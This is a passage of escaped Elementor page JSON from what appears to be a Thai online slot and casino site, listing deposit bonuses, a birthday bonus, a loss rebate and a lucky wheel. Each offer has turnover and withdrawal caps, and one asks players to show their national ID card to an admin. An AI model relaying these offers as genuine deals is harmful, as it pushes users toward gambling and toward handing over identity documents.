\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> 